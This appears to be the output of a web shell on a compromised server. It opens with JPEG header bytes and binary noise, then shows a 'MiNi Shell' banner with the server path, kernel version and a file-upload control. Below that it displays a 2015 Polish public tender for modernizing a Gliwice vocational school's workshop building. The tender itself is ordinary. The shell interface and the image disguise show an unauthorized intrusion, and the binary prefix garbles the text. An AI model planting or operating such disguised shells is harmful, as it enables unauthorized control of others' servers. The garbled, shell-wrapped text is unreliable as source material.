JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150717/106813-N-2015.html

<p class="kh_header"><b>Gliwice: Zespół Szkół Samochodowych ul. J. Kilińskiego 24A - termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25</b><br>
<b>Numer ogłoszenia: 106813 - 2015; data zamieszczenia: 17.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gliwice, Wydział Zamówień Publicznych , Ul. Zwycięstwa 21, 44-100 Gliwice, woj. śląskie, tel. 32 238 55 30, faks 32 238 55 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gliwice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zespół Szkół Samochodowych ul. J. Kilińskiego 24A - termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pomocnicze kody CVP opisujące przedmiot zamówienia:

45.11.11.00-9 Roboty w zakresie burzenia
45.42.10.00-4 Roboty w zakresie stolarki budowlanej
45.42.11.00-5 Instalowanie drzwi i okien, i podobnych elementów
45.26.21.00-2 Roboty przy wznoszeniu rusztowań
45.32.10.00-3 Izolacja cieplna
45.41.00.00-4 Tynkowanie
45.26.12.10-9 Wykonywanie pokryć dachowych
45.40.00.00-1 Roboty wykończeniowe w zakresie obiektów budowlanych
45.33.11.00-7 Instalowanie centralnego ogrzewania
45.32.10.00-3 - Izolacja cieplna
45.23.13.00-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków
45.33.20.00-3 - Roboty instalacyjne wodne i kanalizacyjne
45.22.33.00-9 - Roboty budowlane w zakresie parkingów
45.11.12.00-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
45.11.12.30-9 - Roboty w zakresie stabilizacji gruntu
45.23.32.00-1 - Roboty w zakresie różnych nawierzchni
45.11.13.00-1 - Roboty rozbiórkowe
45.31.10.00-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych

I - zakres prac

W zakres niniejszego zamówienia publicznego pod nazwą Zespół Szkół Samochodowych ul. J. Kilińskiego 24A - termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25 wchodzi:

1. Wycinka i karczowanie 11 szt. drzew wraz z wykonaniem nasadzeń zastępczych.

Uwaga: Na wycinkę przedmiotowych drzew Zamawiający uzyskał decyzję nr Z 120/2014 z dnia 05.06.2014 WE.6131.207.2014.LJ, jednakże decyzja ta utraciła już swoją ważność. Zamawiający wystąpił z wnioskiem o wydanie nowej decyzji zezwalającej na wycinkę tych samych drzew. Na dzień ogłaszania niniejszego postępowania Zamawiający nie uzyskał jeszcze nowej decyzji.
Biorąc powyższe pod uwagę Wykonawca składając swoją ofertę musi uwzględnić w harmonogramie prac, że do wycinki będzie mógł przystąpić dopiero po uprawomocnieniu się decyzji zezwalającej na wycinkę i/lub po zakończeniu się okresu lęgowego dzikich ptaków (16.11.2015).
Wykonawca będzie zobowiązany wypełnić wymagania, które zostaną ujęte w decyzji na wycinkę, w związku z czym Wykonawca w swojej ofercie musi przewidzieć spełnienie co najmniej wymagań, które były określone w decyzji Z 120/2014 z dnia 05.06.2014 WE.6131.207.2014.LJ tj.:

- przeprowadzenie wycinki 11 sztuk drzew, przy czym prace w zakresie wycinki powinny być prowadzone poza okresem lęgowym ptaków, a jeśli Wykonawca podejmie się przeprowadzenia wycinki w czasie trwania okresu lęgowego ptaków to na własny koszt będzie zobowiązany do uzyskania odpowiednich zezwoleń i zapewnienia nadzoru ornitologicznego,

- nasadzenie 12 szt. drzew ozdobnych liściastych, w tym conajmniej 4 szt. o obwodach pni (mierzonych na wys. 100cm) 12-14 cm i wysokości 2,5 do 3,0m i 8 szt o wysokości conajmniej 1,5m.

- przeprowadzanie wszelkich zabiegów pielęgnacyjnych w celu utrzymania żywotności nasadzonych drzew w okresie min. 3 lat od daty dokonania odbioru końcowego całości prac związanych z realizacją przedmiotowego zamówienia.

2. Uporządkowanie gospodarki ściekowej, w tym m.in.:
- budowa kanalizacji deszczowej (wykonanie 2 szt. przyłączy, wykonanie własnej sieci zewnętrznej, wykonanie instalacji zasilania pomp)
- budowa kanalizacji sanitarnej zewnętrznej (wykonanie 1 szt. przyłącza oraz instalacji zewnętrznej),
- budowa drenażu opaskowego z odprowadzeniem wód do instalacji kanalizacji deszczowej,
- przebudowa instalacji kanalizacji sanitarnej wewnętrznej,
- oraz wszystkie prace towarzyszące (jak roboty rozbiórkowe, demontażowe, roboty ziemne, organizacja ruchu na czas robót itp.)

3. Roboty budowlane w zakresie wykonania izolacji ścian zagłębionych w gruncie, na co składa się m.in.:
- osuszenie ścian piwnic,
- wykonanie od strony zewnętrznej iniekcji ścian,
- wykonanie pionowej izolacji przeciwwilgociowej ścian zagłębionych w gruncie
- wykonanie termoizolacji ścian zagłębionych w gruncie,
- wymiana stolarki okiennej piwnic wraz z montażem systemowych studni doświetleniowych,
- oraz wszystkie prace towarzyszące (jak roboty rozbiórkowe, demontażowe, roboty ziemne itp.)

4. Termomodernizacja budynku, na co składa się m.in.:
- wymiana stolarki okiennej,
- wymiana drzwi zewnętrznych,
- wymiana bram garażowych,
- przebudowa zsypów węglowych,
- docieplenie ścian zewnętrznych ponad gruntem,
- docieplenie stropodachów (część A, B, C)
- docieplenie zadaszenia nad stacją diagnostyczną (część wysoka segmentu A)
- docieplenie zadaszenia nad dobudówką przy segmencie C
- przebudowa kominów,
- wykonanie instalacji odgromowej,
- wykonanie oświetlenia elewacji,
- montaż daszku nad wejściem do budynku
- wymiana kotła centralnego ogrzewania wraz z niezbędną przebudową instalacji centralnego ogrzewania,
- regulacja instalacji c.o.
- roboty wykończeniowe
- oraz wszystkie prace towarzyszące (jak roboty rozbiórkowe, demontażowe, montażowe itp.)

5. Zagospodarowanie terenu:
- przebudowa schodów zewnętrznych i murków oporowych,
- roboty rozbiórkowe na terenie dziedzińca,
- wykonanie warstw podbudowy pod ciągi piesze i jezdne,
- wykonanie nawierzchni docelowych
- wykonanie trawników i nasadzeń zastępczych

II - dokumentacja projektowa

Szczegółowy zakres prac (z zastrzeżonymi przez Zamawiającego zmianami ujętymi w punkcie III) został ujęty w dokumentacji projektowej sporządzonej przez Biuro Projektowe Solar System s.c. :

1. Projekt budowlany [PB]- Ocieplenie ścian zewnętrznych, ocieplenie ścian w gruncie, ocieplenie stropodachów, wymiana stolarki okiennej i drzwiowej oraz bram garażowych, wykonanie izolacji przeciwwilgociowej ścian w gruncie dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J. Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
oraz
Projekt wykonawczy - Ocieplenie ścian zewnętrznych, ocieplenie ścian w gruncie, ocieplenie stropodachów, wymiana stolarki okiennej i drzwiowej oraz bram garażowych, wykonanie izolacji przeciwwilgociowej ścian w gruncie dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25 (Zamawiający zmodyfikował część zakresu robót ujętych w opracowaniach. Zakres zmian został ujęty w ust. III)

2. Projekt budowlany [PB]- Przebudowa placów parkingowych od strony ul. Radosnej i ul. Strzelców Bytomskich dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25.
oraz
Projekt wykonawczy [PW]- Przebudowa placów parkingowych od strony ul. Radosnej i ul. Strzelców Bytomskich dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25.
(Zamawiający zmodyfikował część zakresu robót ujętych w opracowaniach. Zakres zmian został ujęty w ust. III)

3. Projekt budowlany [PB]- Projekt przyłącza kanalizacji sanitarnej i deszczowej dla budynku Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25.
oraz
Projekt budowlany [PB]- Projekt przyłącza kanalizacji sanitarnej i deszczowej dla budynku Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25.
(pełen zakres robót objęty opracowaniami)

4. Projekt budowlany [PB]- Przebudowa kanalizacji deszczowej, budowa drenażu opaskowego, przebudowa kanalizacji sanitarnej wewnętrznej i regulacja instalacji centralnego ogrzewania dla budynku Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25.
oraz
Projekt wykonawczy [PW]- Przebudowa kanalizacji deszczowej, budowa drenażu opaskowego, przebudowa kanalizacji sanitarnej wewnętrznej i regulacja instalacji centralnego ogrzewania dla budynku Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25.
(pełen zakres robót objęty opracowaniem)

5. Projekt budowlany [PB] - Przebudowa instalacji elektrycznych dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25.
oraz
Projekt wykonawczy [PW]- przebudowa instalacji elektrycznych dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25.
(pełen zakres objęty opracowaniem)

6. Specyfikacje techniczne wykonania i odbioru robót budowlanych dla robót ogólnobudowlanych, sanitarnych i drogowych (specyfikacja dla robót elektrycznych została ujęta w specyfikacji robót sanitarnych i specyfikacji robót budowlanych), opracowane przez biuro Jednostkę Projektową Solarsystem s.c., 32-400 Myślenice, ul. Słowackiego 42

Przedstawione w ww. dokumentach wskazania na urządzenia techniczne i materiały z podaniem producenta należy traktować jako przykładowe ze względu na zasady ustawy Prawo zamówień publicznych, a zwłaszcza art. 29 do 31.
Zamawiający dopuszcza rozwiązania równoważne opisywanych ww. dokumentach norm, aprobat, specyfikacji technicznych i systemów odniesienia.
Oznacza to, że wykonawcy mogą zaproponować inne niż wyszczególnione w dokumentacji rozwiązania z zachowaniem odpowiednich równoważnych parametrów technicznych, norm, aprobat, specyfikacji technicznych i systemów odniesienia dla osiągnięcia oczekiwanej funkcjonalności całego układu będącego przedmiotem zamówienia z zapewnieniem uzyskania wszelkich ewentualnie wymaganych uzgodnień.

III. - zmiany rzeczowego zakresu zamówienia w odniesieniu do dokumentacji projektowej wymienionej w ust. II, które wprowadza się przez Zamawiającego

Zamawiający wprowadza następujące zmiany względem zakresu robót opisanego w opracowaniach wyszczególnionych w ust. II-dokumentacja projektowa:

1. Rezygnuje się z wykonania przepony poziomej ścian piwnicznych od strony wewnętrznej pomieszczeń piwnicznych. Po osuszeniu ścian należy przeprowadzić iniekcję ścian zewnętrznych, przy czym iniekcja ta ma być wykonywana od strony zewnętrznej budynku. W ramach niniejszego zadania wewnątrz pomieszczeń piwnicznych nie przewiduje się prowadzenia żadnych robót budowlanych związanych z wykonaniem przepony poziomej (skucie tynków i innych okładzin wewnętrznych, wykonanie izolacji podłóg, wykonanie nowych wypraw tynkarskich, demontaż i montaż osprzętu piwnic).

2. Cała nowa stolarka okienna ma być wykonana jako standardowa tj. rezygnuje się z wyposażenia okien w okucia i szyby antywłamaniowe w klasie P4. Cała nowa stolarka okienna ma być wykonana jako okna x profili PCV, 6-komorowe o współczynniku przenikania ciepła dla całego okna < =1,3 W/m2K, współczynnik izolacyjności akustycznej Rw>33dB, okucia rozszczelniające w skrzydle uchylno - rozwiernym, szyby zespolone, ciepłochronne float 4/16/4; 3-uszczelka - modyfikowane tworzywo, nawiewniki higrosterowane dwustrumieniowe - zakres pracy od 30 do 70 % wilgotności względnej w pomieszczeniu, przepływ powietrza od 5 do 35 m3/h, okna wyposażone w klamki z blokada błędnego położenia oraz możliwością mikro-uchylenia.

Funkcje zabezpieczeń antywłamaniowych mają nadal pełnić istniejące kraty zabezpieczające otwory okienne.
W związku z powyższym Wykonawca w swojej ofercie musi dodatkowo uwzględnić koszt oczyszczenia i malowania (na kolor szary) istniejących krat zabezpieczających oraz koszt wszelkich pracy towarzyszących.

3. Rezygnuje się z wykonania prac remontowych wolnostojącego budynku garażu.

4. Rezygnuje się z wykonania nowego ogrodzenia dla agregatu oraz rezygnuje się z wymiany ogrodzenia wykonanego z paneli betonowych i ażurowego z siatki. Wykonawca w swojej ofercie musi dodatkowo uwzględnić: obustronne malowanie ogrodzenia z paneli betonowych (na kolor szary), naprawę i malowanie (na kolor szary) murków betonowych ogrodzenia ażurowego, malowanie (na kolor szary) elementów metalowych ogrodzenia ażurowego z siatki, czyszczenie i ewentualne uzupełnienie elementów klinkierowych podmurówki słupów ogrodzenia ażurowego z siatki.

IV - Inne wymagania Zamawiającego

1. Przy przygotowaniu oferty należy uwzględnić, że:

a). Prace budowlane i instalacyjne wewnątrz budynku należy wykonywać w miesiącach: lipiec - sierpień. W przypadku gdyby prace te miały być prowadzone w innym terminie konieczne będzie uzyskanie przez Wykonawcę akceptacji uprawnionego przedstawiciela Użytkownika harmonogramu prowadzenia prac wewnątrz budynku.
b). Prowadzenie robót wewnątrz budynku po godzinach pracy placówki i w dni wolne wymaga pisemnej zgody uprawnionego przedstawiciela Użytkownika.
c). Wykonawca musi uwzględnić specyfikę pracy w czynnych obiektach oświatowych i dostosować do niej sposób realizacji robót budowlanych.

2. Zamawiający informuje , że w 2015 r. zamierza przeznaczyć na wynagrodzenie Wykonawcy z tytułu wykonanych robót budowlanych kwotę nie większą niż 300 000 zł brutto.

V - Uwagi:

1. Z uwagi na przypadający od 1 marca do 15 października okres ochronny miejsc lęgowych ptaków i nietoperzy Wykonawca będzie zobowiązany:
- przed rozpoczęciem prac do wykonania i przedstawienia Zamawiającemu opinii ornitologicznej i chiropterologicznej sporządzonej przez uprawnione do wykonywania tego typu opinii osoby,
- do zapewnienia na własny koszt podczas realizacji przedmiotu zamówienia nadzoru ornitologicznego i chiropterologicznego,
- do uzyskania-w przypadku wystąpienia w obiekcie miejsc lęgowych ptaków i nietoperzy-odpowiedniej zgody na odstępstwo Regionalnego Dyrektora Ochrony Środowiska od przepisów zawartych w ustawie z dnia 16 kwietnia 2004r. o ochronie przyrody - t.j. Dz.U. z 2013 r., poz. 627 z pózn. zm. (decyzji derogacyjnej),
- do prowadzenia prac pod nadzorem ornitologicznym i chiropterologicznym.

2. Dla przedmiotowego zadania Zamawiający wystąpił z wnioskiem o dofinansowanie do Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej, który został rozpatrzony pozytywnie przez jednostkę udzielającą dofinansowanie. W związku z powyższym Wykonawca będzie zobowiązany do realizacji wymagań WFOŚiGW dla zadań dofinansowywanych (jak np. umieszczenia tablic informacyjnych).

3. Zamawiający odrębnym zamówieniem zlecił wykonanie w systemie zaprojektuj-wybuduj prac w zakresie doboru i montażu kotła grzewczego z ewentualną przebudową części instalacji c.o. w zakresie niezbędnych dla prawidłowego funkcjonowania nowego kotła i instalacji oraz robót towarzyszących niezbędnych do realizacji zadania. Przewidywany czas zakończenia robót budowlanych to 15.10.2015 r .

VI - Załączniki - dokumentacji projektowej:
1. Decyzja o pozwoleniu na budowę nr 1455/2014 z dnia 25.09.2014
2. Dokumentacja projektową opracowaną przez Jednostkę Projektową Solarsystem s.c., 32-400 Myślenice, ul. Słowackiego 42, (przy czym zaznacza się, że Zamawiający w SIWZ dokonał korekty zakresu zamówienia opisanego w wymienionej poniżej dokumentacji projektowej):
- Projekt budowlany [PB]- Ocieplenie ścian zewnętrznych, ocieplenie ścian w gruncie, ocieplenie stropodachów, wymiana stolarki okiennej i drzwiowej oraz bram garażowych, wykonanie izolacji przeciwwilgociowej ścian w gruncie dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J. Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Projekt wykonawczy [PW]- Ocieplenie ścian zewnętrznych, ocieplenie ścian w gruncie, ocieplenie stropodachów, wymiana stolarki okiennej i drzwiowej oraz bram garażowych, wykonanie izolacji przeciwwilgociowej ścian w gruncie dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Projekt budowlany [PB]- Przebudowa placów parkingowych od strony ul. Radosnej i ul. Strzelców Bytomskich dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Projekt wykonawczy [PW]- Przebudowa placów parkingowych od strony ul. Radosnej i ul. Strzelców Bytomskich dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Projekt budowlany [PB]- Projekt przyłącza kanalizacji sanitarnej i deszczowej dla budynku Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Projekt wykonawczy [PW] -- Projekt przyłącza kanalizacji sanitarnej i deszczowej dla budynku Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Projekt budowlany [PB]- Przebudowa kanalizacji deszczowej, budowa drenażu opaskowego, przebudowa kanalizacji sanitarnej wewnętrznej i regulacja instalacji centralnego ogrzewania dla budynku Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Projekt wykonawczy [PW]- Przebudowa kanalizacji deszczowej, budowa drenażu opaskowego, przebudowa kanalizacji sanitarnej wewnętrznej i regulacja instalacji centralnego ogrzewania dla budynku Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Projekt budowlany [PB] - Przebudowa instalacji elektrycznych dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Projekt wykonawczy [PW]- Przebudowa instalacji elektrycznych dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Projekt zagospodarowania terenu dla obiektu Warsztatów Szkolnych Zespołu Szkół Samochodowych w Gliwicach w ramach zadania Zespół Szkół Samochodowych ul. J Kilińskiego termomodernizacja i modernizacja budynku warsztatów szkolnych przy ul. Strzelców Bytomskich 25
- Przedmiary robót (branża budowlana, elektryczna, sanitarna, drogowa)
- Audyt energetyczny budynku

5. Specyfikacje techniczne wykonania i odbioru robót budowlanych dla robót ogólnobudowlanych, sanitarnych i drogowych (specyfikacja dla robót elektrycznych została ujęta w specyfikacji robót sanitarnych i specyfikacji robót budowlanych), opracowane przez biuro Jednostkę Projektową Solarsystem s.c., 32-400 Myślenice, ul. Słowackiego 42

Wymagany okres gwarancji i rękojmi:
Wymagany termin gwarancji: min 36 miesięcy max 72 miesiące licząc od dnia końcowego odbioru robót, przy czym okres gwarancji ma być równy okresowi rękojmi.
Wymagany termin rękojmi: min 36 miesięcy max 72 miesiące licząc od dnia końcowego odbioru robót, przy czym okres rękojmi ma być równy okresowi gwarancji.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający wymaga wniesienia wadium w kwocie 70 000,00 zł (słownie: siedemdziesiąt tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
